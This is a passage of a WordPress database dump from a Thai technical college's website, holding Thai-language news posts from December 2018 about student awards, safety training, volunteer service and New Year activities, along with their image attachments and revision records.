(4951, 3, '2019-01-08 10:16:31', '2019-01-08 03:16:31', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.730626220646902&type=3\"><img class=\"aligncenter size-full wp-image-4952\" src=\"/wp-content/uploads/2019/01/8-1-2562-10-14-00.png\" alt=\"\" width=\"510\" height=\"766\" /></a>', 'วันจันทร์ที่ ๒๔ ธันวาคม ๒๕๖๑ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง มอบโล่ห์รางวัลและเกียรติบัตร ให้กับนักเรียน นักศึกษา และครูผู้ควบคุมทีม ที่ได้คว้ารางวัลในการประชุมวิชาการองค์การนักวิชาชีพในอนาคตแห่งประเทศไทย (อวท.) การแข่งขันทักษะวิชาชีพ ทักษะพื้นฐาน ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ ๓๐ ประจำปีการศึกษา ๒๕๖๑ ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%88%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%92%e0%b9%94-%e0%b8%98%e0%b8%b1%e0%b8%99%e0%b8%a7%e0%b8%b2%e0%b8%84%e0%b8%a1', '', '', '2019-01-08 10:16:31', '2019-01-08 03:16:31', '', 0, 'http://www.technicrayong.ac.th/?p=4951', 180, 'post', '', 0),
(4952, 3, '2019-01-08 10:14:45', '2019-01-08 03:14:45', '', '8-1-2562 10-14-00', '', 'inherit', 'closed', 'closed', '', '8-1-2562-10-14-00', '', '', '2019-01-08 10:14:45', '2019-01-08 03:14:45', '', 4951, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/8-1-2562-10-14-00.png', 0, 'attachment', 'image/png', 0),
(4953, 3, '2019-01-08 10:16:06', '2019-01-08 03:16:06', '', '48420504_730625390646985_9201092473827360768_o', '', 'inherit', 'closed', 'closed', '', '48420504_730625390646985_9201092473827360768_o', '', '', '2019-01-08 10:16:06', '2019-01-08 03:16:06', '', 4951, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/48420504_730625390646985_9201092473827360768_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4954, 3, '2019-01-08 10:16:31', '2019-01-08 03:16:31', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.730626220646902&type=3\"><img class=\"aligncenter size-full wp-image-4952\" src=\"/wp-content/uploads/2019/01/8-1-2562-10-14-00.png\" alt=\"\" width=\"510\" height=\"766\" /></a>', 'วันจันทร์ที่ ๒๔ ธันวาคม ๒๕๖๑ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง มอบโล่ห์รางวัลและเกียรติบัตร ให้กับนักเรียน นักศึกษา และครูผู้ควบคุมทีม ที่ได้คว้ารางวัลในการประชุมวิชาการองค์การนักวิชาชีพในอนาคตแห่งประเทศไทย (อวท.) การแข่งขันทักษะวิชาชีพ ทักษะพื้นฐาน ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ ๓๐ ประจำปีการศึกษา ๒๕๖๑ ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4951-revision-v1', '', '', '2019-01-08 10:16:31', '2019-01-08 03:16:31', '', 4951, 'http://www.technicrayong.ac.th/4951-revision-v1/', 0, 'revision', '', 0),
(4955, 3, '2019-01-08 10:22:29', '2019-01-08 03:22:29', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D731214597254731%26id%3D100010985913485&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ ๒๕ ธันวาคม ๒๕๖๑ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง มอบเกียรติบัตรให้แก่นักศึกษาที่ได้รับรางวัลรองชนะเลิศอันดับ ๒ ในการแข่งขันกีฬา Softball (ซอฟต์บอล) กีฬาเยาวชนแห่งชาติ ครั้งที่ ๔๖ เจียงฮายเกมส์ จังหวัดเชียงราย พร้อมพบปะกับนักเรียน นักศึกษา และร่วมกิจกรรม Merry Christmas กับครูผู้สอนภาษาต่างประเทศ ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%92%e0%b9%95-%e0%b8%98%e0%b8%b1%e0%b8%99%e0%b8%a7%e0%b8%b2%e0%b8%84%e0%b8%a1', '', '', '2019-01-08 10:22:29', '2019-01-08 03:22:29', '', 0, 'http://www.technicrayong.ac.th/?p=4955', 179, 'post', '', 0),
(4956, 3, '2019-01-08 10:21:52', '2019-01-08 03:21:52', '', '48429443_731210100588514_8980302524560965632_o', '', 'inherit', 'closed', 'closed', '', '48429443_731210100588514_8980302524560965632_o', '', '', '2019-01-08 10:21:52', '2019-01-08 03:21:52', '', 4955, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/48429443_731210100588514_8980302524560965632_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4957, 3, '2019-01-08 10:22:29', '2019-01-08 03:22:29', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D731214597254731%26id%3D100010985913485&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ ๒๕ ธันวาคม ๒๕๖๑ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง มอบเกียรติบัตรให้แก่นักศึกษาที่ได้รับรางวัลรองชนะเลิศอันดับ ๒ ในการแข่งขันกีฬา Softball (ซอฟต์บอล) กีฬาเยาวชนแห่งชาติ ครั้งที่ ๔๖ เจียงฮายเกมส์ จังหวัดเชียงราย พร้อมพบปะกับนักเรียน นักศึกษา และร่วมกิจกรรม Merry Christmas กับครูผู้สอนภาษาต่างประเทศ ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4955-revision-v1', '', '', '2019-01-08 10:22:29', '2019-01-08 03:22:29', '', 4955, 'http://www.technicrayong.ac.th/4955-revision-v1/', 0, 'revision', '', 0),
(4958, 3, '2019-01-08 10:25:50', '2019-01-08 03:25:50', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D731219780587546%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ ๒๕ ธันวาคม ๒๕๖๑ นักเรียน นักศึกษา วิทยาลัยเทคนิคระยอง เข้าร่วมกิจกรรมอบรมขับขี่ปลอดภัย กับบริษัท ฮอนด้าปิยะ ระยอง จำกัด โดยวิทยากรบริษัทฯ มาให้ความรู้และแจกของรางวัล ภายใต้โครงการ \"รณรงค์ป้องกันและลดอุบัติเหตุทางถนนภายในสถานศึกษา\" ช่วงก่อนเทศกาลปีใหม่ ๒๕๖๒ ณ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%92%e0%b9%95-%e0%b8%98%e0%b8%b1%e0%b8%99%e0%b8%a7%e0%b8%b2%e0%b8%84%e0%b8%a1-2', '', '', '2019-01-08 10:25:50', '2019-01-08 03:25:50', '', 0, 'http://www.technicrayong.ac.th/?p=4958', 178, 'post', '', 0),
(4959, 3, '2019-01-08 10:25:21', '2019-01-08 03:25:21', '', '48418088_731215260587998_8842527116235898880_o', '', 'inherit', 'closed', 'closed', '', '48418088_731215260587998_8842527116235898880_o', '', '', '2019-01-08 10:25:21', '2019-01-08 03:25:21', '', 4958, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/48418088_731215260587998_8842527116235898880_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4960, 3, '2019-01-08 10:25:50', '2019-01-08 03:25:50', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D731219780587546%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ ๒๕ ธันวาคม ๒๕๖๑ นักเรียน นักศึกษา วิทยาลัยเทคนิคระยอง เข้าร่วมกิจกรรมอบรมขับขี่ปลอดภัย กับบริษัท ฮอนด้าปิยะ ระยอง จำกัด โดยวิทยากรบริษัทฯ มาให้ความรู้และแจกของรางวัล ภายใต้โครงการ \"รณรงค์ป้องกันและลดอุบัติเหตุทางถนนภายในสถานศึกษา\" ช่วงก่อนเทศกาลปีใหม่ ๒๕๖๒ ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4958-revision-v1', '', '', '2019-01-08 10:25:50', '2019-01-08 03:25:50', '', 4958, 'http://www.technicrayong.ac.th/4958-revision-v1/', 0, 'revision', '', 0),
(4961, 3, '2019-01-08 10:35:05', '2019-01-08 03:35:05', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D731318143911043%26id%3D100010985913485&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'แผนกวิชาอาหารและโภชนาการ เข้าร่วมงาน การเตรียมอาหารต้อนรับนายกรัฐมนตรี พลเอก ประยุทธ์ จันทร์โอชา และคณะ นำโดย นายวีระศักดิ์ โควสุรัตน์ รัฐมนตรีว่าการกระทรวงท่องเที่ยวและกีฬา กล่าวแนะนำโครงการร่วมกับตัวแทน ๓๐ ชุมชน รวมถึงร้านอาหารเชฟชุมชน by วิทยาลัยเทคนิคระยอง ในโครงการเชฟชุมชนเพื่อการท่องเที่ยวไทยอย่างยั่งยืน โดยมีคณะผู้บริหารระดับสูงจาก บริษัท พีทีที โกลบอล เคมิคอล จำกัด (มหาชน), เชฟชุมพล แจ้งไพร และทีมงานโรงเรียนการอาหารไทย MSC ร่วมต้อนรับ ทั้งนี้ ท่านนายกรัฐมนตรีได้ร่วมประกอบการทำอาหารท้องถิ่น กับเชฟชุมพล แจ้งไพร ณ ตึกบัญชาการ ๑ ทำเนียบรัฐบาล กรุงเทพมหานคร', '', 'publish', 'closed', 'open', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%ad%e0%b8%b2%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b9%82%e0%b8%a0%e0%b8%8a%e0%b8%99%e0%b8%b2%e0%b8%81', '', '', '2019-01-08 10:35:05', '2019-01-08 03:35:05', '', 0, 'http://www.technicrayong.ac.th/?p=4961', 177, 'post', '', 0),
(4962, 3, '2019-01-08 10:34:17', '2019-01-08 03:34:17', '', '49267029_731317990577725_8424501819081752576_n', '', 'inherit', 'closed', 'closed', '', '49267029_731317990577725_8424501819081752576_n', '', '', '2019-01-08 10:34:17', '2019-01-08 03:34:17', '', 4961, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/49267029_731317990577725_8424501819081752576_n.jpg', 0, 'attachment', 'image/jpeg', 0),
(4963, 3, '2019-01-08 10:35:05', '2019-01-08 03:35:05', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D731318143911043%26id%3D100010985913485&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'แผนกวิชาอาหารและโภชนาการ เข้าร่วมงาน การเตรียมอาหารต้อนรับนายกรัฐมนตรี พลเอก ประยุทธ์ จันทร์โอชา และคณะ นำโดย นายวีระศักดิ์ โควสุรัตน์ รัฐมนตรีว่าการกระทรวงท่องเที่ยวและกีฬา กล่าวแนะนำโครงการร่วมกับตัวแทน ๓๐ ชุมชน รวมถึงร้านอาหารเชฟชุมชน by วิทยาลัยเทคนิคระยอง ในโครงการเชฟชุมชนเพื่อการท่องเที่ยวไทยอย่างยั่งยืน โดยมีคณะผู้บริหารระดับสูงจาก บริษัท พีทีที โกลบอล เคมิคอล จำกัด (มหาชน), เชฟชุมพล แจ้งไพร และทีมงานโรงเรียนการอาหารไทย MSC ร่วมต้อนรับ ทั้งนี้ ท่านนายกรัฐมนตรีได้ร่วมประกอบการทำอาหารท้องถิ่น กับเชฟชุมพล แจ้งไพร ณ ตึกบัญชาการ ๑ ทำเนียบรัฐบาล กรุงเทพมหานคร', '', 'inherit', 'closed', 'closed', '', '4961-revision-v1', '', '', '2019-01-08 10:35:05', '2019-01-08 03:35:05', '', 4961, 'http://www.technicrayong.ac.th/4961-revision-v1/', 0, 'revision', '', 0),
(4964, 3, '2019-01-08 10:44:44', '2019-01-08 03:44:44', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D731814340528090%26id%3D100010985913485&width=500\" width=\"500\" height=\"802\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพุธที่ ๒๖ ธันวาคม ๒๕๖๑ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง มอบประกาศนียบัตรให้กับนักเรียน นักศึกษา และครูผู้ควบคุมทีม \"แผนธุรกิจคุกกี้พริกขี้หนู\" ที่ได้รับการคัดเลือก และจัดแสดงผลงานธุรกิจของทีมธุรกิจดีเด่น ภายใต้โครงการส่งเสริมการประกอบอาชีพอิสระในกลุ่มผู้เรียนอาชีวศึกษา RRR Award ร่วมกับมหาวิทยาลัยธรรมศาสตร์ ทั้งนี้วิทยาลัยเทคนิคระยอง ผ่านการคัดเลือกจำนวน ๑๐ ทีม ซึ่งเป็นตัวแทนระดับชาติ, ได้รับรางวัลขวัญใจกรรมการ ประจำปีการศึกษา ๒๕๖๑ ไปแลกเปลี่ยนและเรียนรู้ ณ ITE College Central Singapore และรางวัลศูนย์บ่มเพาะผู้ประกอบการอาชีวศึกษาดีเด่น ระดับชาติ (๕ ดาว) ประจำปีการศึกษา ๒๕๖๑', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%b8%e0%b8%98%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%92%e0%b9%96-%e0%b8%98%e0%b8%b1%e0%b8%99%e0%b8%a7%e0%b8%b2%e0%b8%84%e0%b8%a1-%e0%b9%92%e0%b9%95%e0%b9%96', '', '', '2019-01-08 10:44:44', '2019-01-08 03:44:44', '', 0, 'http://www.technicrayong.ac.th/?p=4964', 176, 'post', '', 0),
(4965, 3, '2019-01-08 10:44:19', '2019-01-08 03:44:19', '', '48417488_731813057194885_7345012555745591296_o', '', 'inherit', 'closed', 'closed', '', '48417488_731813057194885_7345012555745591296_o', '', '', '2019-01-08 10:44:19', '2019-01-08 03:44:19', '', 4964, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/48417488_731813057194885_7345012555745591296_o.jpg', 0, 'attachment', 'image/jpeg', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4966, 3, '2019-01-08 10:44:44', '2019-01-08 03:44:44', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D731814340528090%26id%3D100010985913485&width=500\" width=\"500\" height=\"802\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพุธที่ ๒๖ ธันวาคม ๒๕๖๑ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง มอบประกาศนียบัตรให้กับนักเรียน นักศึกษา และครูผู้ควบคุมทีม \"แผนธุรกิจคุกกี้พริกขี้หนู\" ที่ได้รับการคัดเลือก และจัดแสดงผลงานธุรกิจของทีมธุรกิจดีเด่น ภายใต้โครงการส่งเสริมการประกอบอาชีพอิสระในกลุ่มผู้เรียนอาชีวศึกษา RRR Award ร่วมกับมหาวิทยาลัยธรรมศาสตร์ ทั้งนี้วิทยาลัยเทคนิคระยอง ผ่านการคัดเลือกจำนวน ๑๐ ทีม ซึ่งเป็นตัวแทนระดับชาติ, ได้รับรางวัลขวัญใจกรรมการ ประจำปีการศึกษา ๒๕๖๑ ไปแลกเปลี่ยนและเรียนรู้ ณ ITE College Central Singapore และรางวัลศูนย์บ่มเพาะผู้ประกอบการอาชีวศึกษาดีเด่น ระดับชาติ (๕ ดาว) ประจำปีการศึกษา ๒๕๖๑', '', 'inherit', 'closed', 'closed', '', '4964-revision-v1', '', '', '2019-01-08 10:44:44', '2019-01-08 03:44:44', '', 4964, 'http://www.technicrayong.ac.th/4964-revision-v1/', 0, 'revision', '', 0),
(4967, 3, '2019-01-08 10:52:26', '2019-01-08 03:52:26', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.732403837135807&type=3\"><img class=\"aligncenter size-full wp-image-4968\" src=\"/wp-content/uploads/2019/01/8-1-2562-10-49-39.png\" alt=\"\" width=\"501\" height=\"793\" /></a>', 'ตามที่สำนักงานคณะกรรมการการอาชีวศึกษา ได้มีนโยบายในการดำเนินโครงการเพื่อสร้างค่านิยมและปรับภาพลักษณ์ให้แก่ผู้เรียนอาชีวศึกษา วิทยาลัยเทคนิคระยอง จึงได้จัดโครงการอาชีวะอาสา ภายใต้ “โครงการอาชีวะอาสาเทศกาลปีใหม่ ๒๕๖๒” โดยได้รับเกียรติ จากท่านสุรศักดิ์ เจริญศิริโชติ ผู้ว่าราชการจังหวัดระยอง มาเป็นประธานในพิธีเปิด และว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นผู้กล่าวรายงานวัตถุประสงค์ในการจัดงานในครั้งนี้ ซึ่งศูนย์บริการอาชีวะอาสา จะให้บริการประชาชน เพื่อแก้ไขปัญหาข้อบกพร่องของยานพาหนะ, ตรวจสภาพรถยนต์, รถจักรยานยนต์ และอำนวยความสะดวกในระหว่างการเดินทางในช่วงเทศกาลปีใหม่ ให้มีอัตราการเกิดอุบัติเหตุน้อยลง รวมทั้งให้บริการกรณีฉุกเฉินนอกพื้นที่ โดยจะจัดตั้งศูนย์บริการอาชีวะอาสา ในระหว่างวันที่ ๒๗ ธันวาคม ๒๕๖๑ - ๒ มกราคม ๒๕๖๒ ในช่วงเวลา ๐๘.๓๐ - ๐๐.๓๐ น. (๒ ผลัด) ณ บริเวณปั้ม ปตท. สมาพันธ์พัฒนา จำกัด ถนนสาย ๓๖ ตำบลเชิงเนิน อำเภอเมือง จังหวัดระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%95%e0%b8%b2%e0%b8%a1%e0%b8%97%e0%b8%b5%e0%b9%88%e0%b8%aa%e0%b8%b3%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%84%e0%b8%93%e0%b8%b0%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%81', '', '', '2019-01-08 10:52:26', '2019-01-08 03:52:26', '', 0, 'http://www.technicrayong.ac.th/?p=4967', 175, 'post', '', 0),
(4968, 3, '2019-01-08 10:50:08', '2019-01-08 03:50:08', '', '8-1-2562 10-49-39', '', 'inherit', 'closed', 'closed', '', '8-1-2562-10-49-39', '', '', '2019-01-08 10:50:08', '2019-01-08 03:50:08', '', 4967, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/8-1-2562-10-49-39.png', 0, 'attachment', 'image/png', 0),
(4969, 3, '2019-01-08 10:51:25', '2019-01-08 03:51:25', '', '48429212_732402777135913_598125276014051328_o', '', 'inherit', 'closed', 'closed', '', '48429212_732402777135913_598125276014051328_o', '', '', '2019-01-08 10:51:25', '2019-01-08 03:51:25', '', 4967, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/48429212_732402777135913_598125276014051328_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4970, 3, '2019-01-08 10:52:26', '2019-01-08 03:52:26', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.732403837135807&type=3\"><img class=\"aligncenter size-full wp-image-4968\" src=\"/wp-content/uploads/2019/01/8-1-2562-10-49-39.png\" alt=\"\" width=\"501\" height=\"793\" /></a>', 'ตามที่สำนักงานคณะกรรมการการอาชีวศึกษา ได้มีนโยบายในการดำเนินโครงการเพื่อสร้างค่านิยมและปรับภาพลักษณ์ให้แก่ผู้เรียนอาชีวศึกษา วิทยาลัยเทคนิคระยอง จึงได้จัดโครงการอาชีวะอาสา ภายใต้ “โครงการอาชีวะอาสาเทศกาลปีใหม่ ๒๕๖๒” โดยได้รับเกียรติ จากท่านสุรศักดิ์ เจริญศิริโชติ ผู้ว่าราชการจังหวัดระยอง มาเป็นประธานในพิธีเปิด และว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นผู้กล่าวรายงานวัตถุประสงค์ในการจัดงานในครั้งนี้ ซึ่งศูนย์บริการอาชีวะอาสา จะให้บริการประชาชน เพื่อแก้ไขปัญหาข้อบกพร่องของยานพาหนะ, ตรวจสภาพรถยนต์, รถจักรยานยนต์ และอำนวยความสะดวกในระหว่างการเดินทางในช่วงเทศกาลปีใหม่ ให้มีอัตราการเกิดอุบัติเหตุน้อยลง รวมทั้งให้บริการกรณีฉุกเฉินนอกพื้นที่ โดยจะจัดตั้งศูนย์บริการอาชีวะอาสา ในระหว่างวันที่ ๒๗ ธันวาคม ๒๕๖๑ - ๒ มกราคม ๒๕๖๒ ในช่วงเวลา ๐๘.๓๐ - ๐๐.๓๐ น. (๒ ผลัด) ณ บริเวณปั้ม ปตท. สมาพันธ์พัฒนา จำกัด ถนนสาย ๓๖ ตำบลเชิงเนิน อำเภอเมือง จังหวัดระยอง', '', 'inherit', 'closed', 'closed', '', '4967-revision-v1', '', '', '2019-01-08 10:52:26', '2019-01-08 03:52:26', '', 4967, 'http://www.technicrayong.ac.th/4967-revision-v1/', 0, 'revision', '', 0),
(4971, 3, '2019-01-08 10:56:34', '2019-01-08 03:56:34', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.732407523802105&type=3\"><img class=\"aligncenter size-full wp-image-4972\" src=\"/wp-content/uploads/2019/01/8-1-2562-10-54-40.png\" alt=\"\" width=\"504\" height=\"725\" /></a>', 'วันพฤหัสบดีที่ ๒๗ ธันวาคม ๒๕๖๑ ว่าที่เรือตรี ชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะผู้บริหาร ครู บุคลากรทางการศึกษา และนักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง เข้าร่วมทำบุญตักบาตรข้าวสารอาหารแห้ง เนื่องในโอกาสขึ้นปีใหม่ ๒๕๖๒ และกิจกรรมกีฬาสานสัมพันธ์บุคลากรทางการศึกษา ณ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%a4%e0%b8%ab%e0%b8%b1%e0%b8%aa%e0%b8%9a%e0%b8%94%e0%b8%b5%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%92%e0%b9%97-%e0%b8%98%e0%b8%b1%e0%b8%99%e0%b8%a7%e0%b8%b2%e0%b8%84', '', '', '2019-01-08 10:57:59', '2019-01-08 03:57:59', '', 0, 'http://www.technicrayong.ac.th/?p=4971', 174, 'post', '', 0),
(4972, 3, '2019-01-08 10:55:06', '2019-01-08 03:55:06', '', '8-1-2562 10-54-40', '', 'inherit', 'closed', 'closed', '', '8-1-2562-10-54-40', '', '', '2019-01-08 10:55:06', '2019-01-08 03:55:06', '', 4971, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/8-1-2562-10-54-40.png', 0, 'attachment', 'image/png', 0),
(4973, 3, '2019-01-08 10:56:34', '2019-01-08 03:56:34', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.732407523802105&type=3\"><img class=\"aligncenter size-full wp-image-4972\" src=\"/wp-content/uploads/2019/01/8-1-2562-10-54-40.png\" alt=\"\" width=\"504\" height=\"725\" /></a>', 'วันพฤหัสบดีที่ ๒๗ ธันวาคม ๒๕๖๑ ว่าที่เรือตรี ชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะผู้บริหาร ครู บุคลากรทางการศึกษา และนักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง เข้าร่วมทำบุญตักบาตรข้าวสารอาหารแห้ง เนื่องในโอกาสขึ้นปีใหม่ ๒๕๖๒ และกิจกรรมกีฬาสานสัมพันธ์บุคลากรทางการศึกษา ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4971-revision-v1', '', '', '2019-01-08 10:56:34', '2019-01-08 03:56:34', '', 4971, 'http://www.technicrayong.ac.th/4971-revision-v1/', 0, 'revision', '', 0),
(4974, 3, '2019-01-08 10:57:37', '2019-01-08 03:57:37', '', '49205946_732408127135378_4233994441322397696_o', '', 'inherit', 'closed', 'closed', '', '49205946_732408127135378_4233994441322397696_o', '', '', '2019-01-08 10:57:37', '2019-01-08 03:57:37', '', 4971, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/49205946_732408127135378_4233994441322397696_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4975, 3, '2019-01-08 11:04:42', '2019-01-08 04:04:42', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D733185837057607%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันศุกร์ที่ ๒๘ ธันวาคม ๒๕๖๑ คณะผู้บริหาร ครู และนักเรียน นักศึกษา แผนกวิชาอาหารและโภชนาการ วิทยาลัยเทคนิคระยอง จัดตั้งโครงการมอบของขวัญปีใหม่ ๒๕๖๒ เพื่อประชาชน เปิดสอนทำขนมเค้ก คุกกี้ และแจกให้แก่ประชาชน ตามนโยบายของสำนักงานคณะกรรมการการอาชีวศึกษา ซึ่งโครงการดังกล่าว จัดขึ้นระหว่างวันที่ ๒๘-๒๙ ธันวาคม ๒๕๖๑ ณ ร้านอาหารใบชะมวง วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%a8%e0%b8%b8%e0%b8%81%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%92%e0%b9%98-%e0%b8%98%e0%b8%b1%e0%b8%99%e0%b8%a7%e0%b8%b2%e0%b8%84%e0%b8%a1-%e0%b9%92', '', '', '2019-01-08 11:04:42', '2019-01-08 04:04:42', '', 0, 'http://www.technicrayong.ac.th/?p=4975', 173, 'post', '', 0),
(4976, 3, '2019-01-08 11:04:06', '2019-01-08 04:04:06', '', '49204557_733180783724779_2079552645655166976_o', '', 'inherit', 'closed', 'closed', '', '49204557_733180783724779_2079552645655166976_o', '', '', '2019-01-08 11:04:06', '2019-01-08 04:04:06', '', 4975, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/49204557_733180783724779_2079552645655166976_o.jpg', 0, 'attachment', 'image/jpeg', 0),
